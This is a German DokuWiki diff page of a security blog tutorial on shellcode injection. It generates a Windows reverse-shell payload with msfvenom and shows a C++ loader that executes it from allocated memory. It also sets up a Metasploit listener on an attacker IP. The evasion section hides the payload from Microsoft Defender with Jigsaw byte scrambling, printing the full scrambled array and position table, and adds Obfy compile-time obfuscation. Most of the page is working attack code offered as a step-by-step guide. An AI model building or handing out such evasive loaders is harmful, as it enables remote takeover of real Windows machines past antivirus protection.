Unterschiede
Hier werden die Unterschiede zwischen zwei Versionen angezeigt.
Beide Seiten der vorigen Revision Vorhergehende Überarbeitung Nächste Überarbeitung | Vorhergehende ÜberarbeitungLetzte ÜberarbeitungBeide Seiten der Revision | ||
it-security:blog:shellcode_injection-1 [2024/04/26 14:00] – alte Version wiederhergestellt (2024/04/26 13:55) psycore | it-security:blog:shellcode_injection-1 [2024/05/11 23:31] – psycore | ||
---|---|---|---|
Zeile 1: | Zeile 1: | ||
+ | {{tag> | ||
+ | ====== Shellcode Injection Teil 1 ====== | ||
+ | {{: | ||
+ | |||
+ | Alle benötigten Dateien findet ihr im [[it-security: | ||
+ | \\ | ||
+ | \\ | ||
+ | ===== Shellcode generieren ===== | ||
+ | |||
+ | {{page> | ||
+ | |||
+ | {{: | ||
+ | |||
+ | Den Shellcode generieren wir mit '' | ||
+ | |||
+ | ^ Parameter ^ Beschreibung ^ | ||
+ | | -p - Payload | x86 Reverse Shell | | ||
+ | | LHOST | IP des Angreifers | | ||
+ | | LPORT | Listening Port des Angreifers | | ||
+ | | -b - Bad Chars | Spezielle Zeichen müssen wir rausfiltern, | ||
+ | | -e - Encode Shellcode | Wir enkodieren unseren Shellcode | | ||
+ | | -i - Iterations | Gibt die Anzahl der Enkodierungsvorgänge an | | ||
+ | | -f - Format | Die Ausgabe soll im C-Format sein | | ||
+ | | > shell.c | Speichere in die Datei shell.c | | ||
+ | |||
+ | <code bash> | ||
+ | msfvenom -p windows/ | ||
+ | </ | ||
+ | \\ | ||
+ | \\ | ||
+ | ===== C++ Injector ===== | ||
+ | |||
+ | Wir erstellen uns ein neues C++ Projekt und fügen den Shellcode ein. Zusätzlich brauchen wir die Größe der Bytes. Diese entnehmen wir der '' | ||
+ | |||
+ | <file cpp local-process-injection.cpp> | ||
+ | #include < | ||
+ | #include < | ||
+ | |||
+ | //shell.c | ||
+ | unsigned const char payload[] = | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | |||
+ | //size is given by msfvenom after shellcode creation | ||
+ | size_t size = 540; | ||
+ | |||
+ | int main(int argc, char** argv) { | ||
+ | char* code; | ||
+ | printf("# | ||
+ | code = (char*)VirtualAlloc(NULL, | ||
+ | memcpy(code, | ||
+ | ((void(*)())code)(); | ||
+ | return(0); | ||
+ | } | ||
+ | </ | ||
+ | \\ | ||
+ | \\ | ||
+ | ==== Shellcode analysieren ==== | ||
+ | |||
+ | Nach dem Kompilieren, | ||
+ | |||
+ | [{{: | ||
+ | \\ | ||
+ | \\ | ||
+ | ==== Metasploit vorbereiten ==== | ||
+ | |||
+ | Nun starten wir einen Handler in Metasploit, der die Reverse-Shell annimmt. | ||
+ | |||
+ | <code ruby> | ||
+ | msf6 > use exploit/ | ||
+ | [*] Using configured payload generic/ | ||
+ | msf6 exploit(multi/ | ||
+ | lport => 445 | ||
+ | msf6 exploit(multi/ | ||
+ | lhost => 172.23.61.130 | ||
+ | msf6 exploit(multi/ | ||
+ | |||
+ | [*] Started reverse TCP handler on 172.23.61.130: | ||
+ | </ | ||
+ | \\ | ||
+ | \\ | ||
+ | ==== Shellcode ausführen ==== | ||
+ | |||
+ | Wir starten jetzt '' | ||
+ | |||
+ | [{{: | ||
+ | |||
+ | [{{: | ||
+ | \\ | ||
+ | \\ | ||
+ | ===== Unter dem Defender-Radar ===== | ||
+ | |||
+ | '' | ||
+ | \\ | ||
+ | \\ | ||
+ | ==== Shellcode tarnen - Jigsaw ==== | ||
+ | |||
+ | Zuerst erstellen wir den Shellcode im Raw Format: | ||
+ | |||
+ | <code bash> | ||
+ | msfvenom -p windows/ | ||
+ | </ | ||
+ | |||
+ | Dann übergeben wir diesen an Jigsaw: | ||
+ | |||
+ | <code dos> | ||
+ | python3 jigsaw.py shell.raw | ||
+ | </ | ||
+ | |||
+ | und erhalten eine Datei mit C++ Code. | ||
+ | |||
+ | <code c++> | ||
+ | unsigned char jigsaw[540] = { 0x32, 0x87, 0xbe, 0x4b, 0x6c, 0xad, 0xc2, 0xd3, 0xd5, 0x21, 0x1c, 0x57, 0x93, 0xae, 0x39, 0x2c, 0x27, 0xce, 0xeb, 0x99, 0xa8, 0xf4, 0xbf, 0x14, 0x31, 0x2a, | ||
+ | ... | ||
+ | 401, 459, 65, 118, 356, 42, 182, 220 }; | ||
+ | |||
+ | |||
+ | int calc_len = 540; | ||
+ | unsigned char calc_payload[540] = { 0x00 }; | ||
+ | int position; | ||
+ | |||
+ | // Reconstruct the payload | ||
+ | for (int idx = 0; idx < sizeof(positions) / sizeof(positions[0]); | ||
+ | position = positions[idx]; | ||
+ | calc_payload[position] = jigsaw[idx]; | ||
+ | } | ||
+ | </ | ||
+ | |||
+ | <file c++ Inject.cpp> | ||
+ | #include < | ||
+ | #include < | ||
+ | |||
+ | size_t size = 540; | ||
+ | |||
+ | unsigned char jigsaw[540] = { 0x32, 0x87, 0xbe, 0x4b, 0x6c, 0xad, 0xc2, 0xd3, 0xd5, 0x21, 0x1c, 0x57, 0x93, 0xae, 0x39, 0x2c, 0x27, 0xce, 0xeb, 0x99, 0xa8, 0xf4, 0xbf, 0x14, 0x31, 0x2a, 0xc5, 0xeb, 0x48, 0x11, 0xd8, 0x49, 0xf0, 0x93, 0x5b, 0xb9, 0x69, 0xf8, 0x73, 0x80, 0xe4, 0x3f, 0xa6, 0xa6, 0x3a, 0xf5, 0x56, 0x12, 0x7c, 0xe4, 0x72, 0xbb, 0x13, 0x5b, 0xc5, 0x40, 0xf0, 0x01, 0x6f, 0x0b, 0x35, 0xc2, 0x1c, 0x2d, 0x76, 0xeb, 0x9e, 0xd8, 0xd6, 0x39, 0x7c, 0x61, 0x7e, 0xc7, 0x16, 0x69, 0x0e, 0x1c, 0x78, 0xb0, 0xa3, 0x36, 0x5b, 0x6f, 0xbc, 0xa0, 0x2e, 0x63, 0xe4, 0x7f, 0xea, 0x13, 0x2c, 0xaa, 0x6c, 0xbf, 0xdb, 0x4a, 0x69, 0xaa, 0x4d, 0x71, 0xd6, 0x4c, 0x61, 0x65, 0x59, 0xc3, 0x5f, 0x43, 0xf3, 0x94, 0xdf, 0x59, 0x8d, 0xbb, 0x25, 0x8f, 0x6f, 0x17, 0x1d, 0xd7, 0xa1, 0xef, 0x9b, 0xe0, 0x31, 0x15, 0x36, 0xe2, 0x5c, 0xa5, 0x94, 0x60, 0x01, 0x2b, 0x08, 0x01, 0x9f, 0xa1, 0x14, 0x2b, 0x86, 0x1f, 0xbf, 0xd1, 0x0f, 0xbf, 0x03, 0x28, 0xc1, 0x10, 0x4d, 0x66, 0x32, 0xd0, 0xcb, 0x4e, 0x34, 0xdf, 0xeb, 0x99, 0xf2, 0x14, 0x3f, 0x4c, 0xf8, 0xed, 0xc1, 0xbd, 0x0e, 0x9b, 0xc1, 0x57, 0xd5, 0x1d, 0x01, 0xf5, 0x79, 0xd1, 0xc4, 0xea, 0xc0, 0xcf, 0x0c, 0xea, 0x05, 0x9d, 0x8c, 0x8d, 0x9a, 0x2d, 0x94, 0x5b, 0x05, 0xde, 0x37, 0xa6, 0x17, 0x80, 0x07, 0x83, 0x6a, 0x2d, 0xe4, 0xd5, 0xc3, 0x85, 0x71, 0x2a, 0xa4, 0x3d, 0xf6, 0x5c, 0xc8, 0x6c, 0x6a, 0x86, 0xf3, 0x5c, 0x67, 0x4d, 0xdc, 0x11, 0xff, 0x81, 0xce, 0x3b, 0x9c, 0x4d, 0x98, 0xe8, 0xd4, 0x6a, 0x3e, 0x4b, 0x51, 0xd5, 0x4c, 0xfc, 0xe4, 0x8e, 0x6a, 0xc1, 0x63, 0x54, 0x7f, 0x61, 0xa4, 0x42, 0x60, 0xb5, 0x4d, 0x92, 0xd9, 0x08, 0x22, 0x23, 0xbe, 0x82, 0x9f, 0x4c, 0xeb, 0x8c, 0x3a, 0x6e, 0x88, 0xd0, 0x5a, 0xe0, 0xae, 0x42, 0x38, 0x4d, 0x31, 0xd0, 0xe6, 0x72, 0x54, 0xb3, 0x2b, 0x8d, 0x2f, 0xca, 0x38, 0x92, 0xe6, 0x38, 0xfd, 0xa1, 0x9c, 0x70, 0xd0, 0xe5, 0xb5, 0xff, 0xe1, 0x0e, 0x81, 0x4a, 0xc5, 0x67, 0x57, 0x3a, 0x33, 0xa0, 0xc8, 0x7f, 0xe6, 0x6c, 0xf1, 0x77, 0x3d, 0xdd, 0x63, 0xa1, 0xf9, 0x4f, 0x99, 0xf1, 0x8a, 0xb3, 0x60, 0xf6, 0xae, 0x86, 0xd5, 0x3e, 0x61, 0xc4, 0x93, 0xd9, 0x2d, 0xbe, 0xe2, 0xf0, 0xec, 0x13, 0x85, 0x91, 0x8a, 0x95, 0x37, 0x9f, 0x41, 0x43, 0x3c, 0xda, 0x81, 0xb3, 0xf5, 0xa9, 0x5f, 0x3e, 0x06, 0x0e, 0x47, 0x03, 0x5e, 0x28, 0xec, 0x54, 0x9f, 0x95, 0xca, 0x59, 0xee, 0x9a, 0xd2, 0xe5, 0xa4, 0x32, 0xcf, 0xb9, 0xe5, 0xd8, 0x78, 0xe8, 0xb1, 0xa5, 0xee, 0xe5, 0x4e, 0x2c, 0x8b, 0xc3, 0x5b, 0x7d, 0x23, 0x18, 0x64, 0xda, 0x56, 0x59, 0xa9, 0x95, 0x6f, 0x9e, 0x9b, 0x3c, 0xcb, 0x2a, 0x54, 0x6a, 0x5c, 0x25, 0xf6, 0xc1, 0xf9, 0x5c, 0xab, 0xe5, 0xd0, 0x8b, 0xdd, 0xd0, 0x74, 0xda, 0x68, 0x09, 0x52, 0x25, 0xd0, 0xa9, 0xd1, 0xba, 0x9f, 0xcd, 0x41, 0x54, 0x15, 0x12, 0xba, 0xd2, 0xd5, 0xdd, 0x35, 0x76, 0xa8, 0x5a, 0xdc, 0xf0, 0xdb, 0xbd, 0x32, 0x47, 0x6d, 0x4b, 0x89, 0x17, 0xa1, 0x80, 0x46, 0x65, 0x51, 0x4b, 0xca, 0xeb, 0xa4, 0x0c, 0xd9, 0x3c, 0xf4, 0x1e, 0x39, 0xd4, 0x87, 0x91, 0x91, 0xbd, 0x75, 0x24, 0x7a, 0x7b, 0x79, 0x25, 0x7e, 0x2d, 0xc9, 0xd4, 0x73, 0x47, 0x05, 0xe4, 0xed, 0x24, 0x10, 0xbe, 0x15, 0xa5, 0xb0, 0x3a, 0x43, 0x9e, 0xc3, 0xef, 0x5d, 0x57, 0xfe, 0xeb, 0x75, 0x85, 0x11, 0xe7, 0x50, 0xc7, 0x9c, 0x6f, 0xe1, 0x7b, 0x63, 0xcb, 0xbe, 0x17, 0xeb, 0x1e, 0x34, 0x91, 0xf9, 0x50, 0xe5, 0x28, 0x74, 0x9f, 0x3e, 0xe0, 0xe8, 0x83, 0x36, 0xc0, 0x08, 0xcd, 0x8f, 0xa7, 0xb8, 0x32, 0xf4, 0x01, 0x96, 0xd2 }; | ||
+ | |||
+ | int positions[540] = { 105, 216, 295, 137, 269, 55, 488, 354, 384, 2, 398, 471, 219, 72, 377, 123, 197, 188, 243, 161, 169, 79, 290, 454, 387, 527, 480, 412, 178, 329, 267, 441, 492, 416, 103, 196, 83, 275, 539, 26, 391, 125, 203, 59, 153, 76, 349, 402, 202, 142, 68, 1, 18, 288, 106, 62, 291, 281, 107, 365, 35, 223, 358, 117, 503, 427, 506, 181, 63, 408, 525, 176, 313, 23, 417, 311, 195, 89, 122, 522, 494, 170, 152, 20, 304, 227, 150, 29, 460, 319, 228, 312, 376, 36, 256, 24, 37, 320, 518, 514, 355, 443, 43, 64, 128, 483, 470, 462, 11, 224, 212, 75, 345, 465, 115, 110, 138, 380, 190, 333, 323, 501, 149, 455, 226, 209, 16, 361, 508, 54, 139, 232, 373, 370, 236, 207, 394, 238, 34, 532, 395, 531, 489, 177, 415, 453, 495, 155, 302, 318, 218, 330, 116, 242, 435, 346, 334, 154, 449, 475, 104, 464, 450, 292, 307, 126, 71, 482, 509, 258, 353, 348, 45, 372, 463, 485, 505, 414, 276, 86, 6, 298, 383, 347, 201, 409, 498, 478, 366, 331, 88, 134, 324, 95, 111, 397, 425, 51, 259, 315, 102, 22, 337, 237, 241, 82, 526, 444, 278, 120, 456, 273, 167, 419, 251, 484, 270, 423, 77, 211, 184, 375, 156, 473, 466, 15, 519, 407, 185, 92, 91, 523, 221, 49, 371, 338, 277, 516, 250, 143, 406, 147, 225, 515, 70, 252, 193, 367, 486, 504, 434, 440, 437, 350, 271, 282, 205, 166, 511, 248, 191, 404, 369, 279, 424, 336, 266, 90, 474, 533, 260, 389, 235, 151, 368, 457, 164, 436, 140, 468, 335, 386, 325, 213, 360, 41, 189, 538, 310, 200, 157, 421, 93, 287, 112, 280, 289, 528, 305, 73, 100, 231, 517, 165, 12, 136, 210, 496, 314, 244, 422, 58, 97, 426, 481, 96, 420, 530, 253, 439, 382, 309, 127, 46, 33, 113, 513, 390, 4, 222, 520, 27, 472, 284, 296, 192, 268, 21, 357, 306, 497, 130, 98, 163, 67, 80, 317, 467, 249, 99, 274, 493, 234, 438, 392, 217, 262, 19, 146, 160, 133, 124, 430, 114, 159, 186, 374, 174, 403, 411, 299, 447, 499, 158, 378, 148, 381, 458, 14, 78, 272, 264, 442, 109, 429, 255, 171, 246, 57, 162, 500, 535, 339, 198, 48, 84, 17, 145, 74, 431, 534, 294, 477, 461, 87, 206, 131, 328, 53, 388, 168, 293, 490, 359, 5, 362, 8, 129, 32, 239, 400, 510, 326, 183, 240, 405, 285, 173, 340, 135, 364, 50, 172, 537, 180, 132, 214, 141, 507, 47, 199, 343, 432, 108, 521, 229, 451, 28, 247, 101, 187, 303, 69, 418, 352, 342, 179, 265, 233, 61, 7, 31, 10, 263, 44, 283, 39, 410, 300, 0, 230, 9, 38, 445, 121, 119, 175, 399, 13, 208, 297, 479, 413, 81, 446, 316, 428, 452, 448, 385, 30, 322, 512, 487, 25, 286, 94, 66, 341, 476, 3, 351, 433, 469, 245, 52, 301, 396, 60, 40, 215, 332, 524, 344, 502, 363, 261, 491, 85, 536, 204, 308, 393, 529, 327, 254, 56, 321, 257, 194, 379, 144, 401, 459, 65, 118, 356, 42, 182, 220 }; | ||
+ | |||
+ | |||
+ | int calc_len = 540; | ||
+ | unsigned char calc_payload[540] = { 0x00 }; | ||
+ | int position; | ||
+ | |||
+ | int main(int argc, char** argv) { | ||
+ | |||
+ | char* code; | ||
+ | |||
+ | printf("# | ||
+ | |||
+ | // Reconstruct the payload | ||
+ | for (int idx = 0; idx < sizeof(positions) / sizeof(positions[0]); | ||
+ | position = positions[idx]; | ||
+ | calc_payload[position] = jigsaw[idx]; | ||
+ | } | ||
+ | code = (char*)VirtualAlloc(NULL, | ||
+ | |||
+ | memcpy(code, | ||
+ | |||
+ | ((void(*)())code)(); | ||
+ | |||
+ | |||
+ | return(0); | ||
+ | } | ||
+ | </ | ||
+ | |||
+ | Jigsaw allein reicht an dieser Stelle jedoch nicht, da der Defender die Datei immer noch erkennt. | ||
+ | |||
+ | {{: | ||
+ | \\ | ||
+ | \\ | ||
+ | ==== Obfy - Verschleierung während des Kompilierens ==== | ||
+ | |||
+ | Hier können wir das sogenannte Template Metaprogramming anwenden. Hierbei werden Quellcode Dateien während des Kompiliervorgangs erzeugt, welche die Binärdatei mit jedem Vorgang anders aussehen lässt. ((https:// | ||
+ | |||
+ | Hierzu laden wir uns [[https:// | ||
+ | |||
+ | <code c++ [enable_line_numbers=" | ||
+ | #include < | ||
+ | #include < | ||
+ | #include " | ||
+ | |||
+ | size_t size = 540; | ||
+ | |||
+ | unsigned char jigsaw[540] = { ... }; | ||
+ | |||
+ | int positions[540] = { ... }; | ||
+ | |||
+ | int calc_len = 540; | ||
+ | unsigned char calc_payload[540] = { 0x00 }; | ||
+ | int position; | ||
+ | |||
+ | int main(int argc, char** argv) { | ||
+ | |||
+ | char* code; | ||
+ | |||
+ | printf("# | ||
+ | |||
+ | // Reconstruct the payload | ||
+ | OBF_BEGIN | ||
+ | for (int idx = 0; idx < sizeof(positions) / sizeof(positions[0]); | ||
+ | position = positions[idx]; | ||
+ | calc_payload[position] = jigsaw[idx]; | ||
+ | } | ||
+ | OBF_END | ||
+ | code = (char*)VirtualAlloc(NULL, | ||
+ | |||
+ | memcpy(code, | ||
+ | |||
+ | ((void(*)())code)(); | ||
+ | |||
+ | |||
+ | return(0); | ||
+ | } | ||
+ | </ | ||
+ | \\ | ||
+ | \\ | ||
+ | ===== Ergebnis ===== | ||
+ | |||
+ | Wir kompilieren unseren Code und prüfen mit '' | ||
+ | |||
+ | [{{: | ||
+ | |||
+ | [{{: | ||
+ | \\ | ||
+ | \\ | ||
+ | ===== Repository ===== | ||
+ | |||
+ | <code bash> | ||
+ | git clone https:// | ||
+ | </ | ||
+ | \\ | ||
+ | \\ | ||
+ | ===== Ausblick ===== | ||
+ | |||
+ | In Teil 2 beschäftigen wir uns damit den Shellcode in einen Remote Prozess zu injecten. | ||
+ | \\ | ||
+ | \\ | ||
+ | ~~DISCUSSION~~ |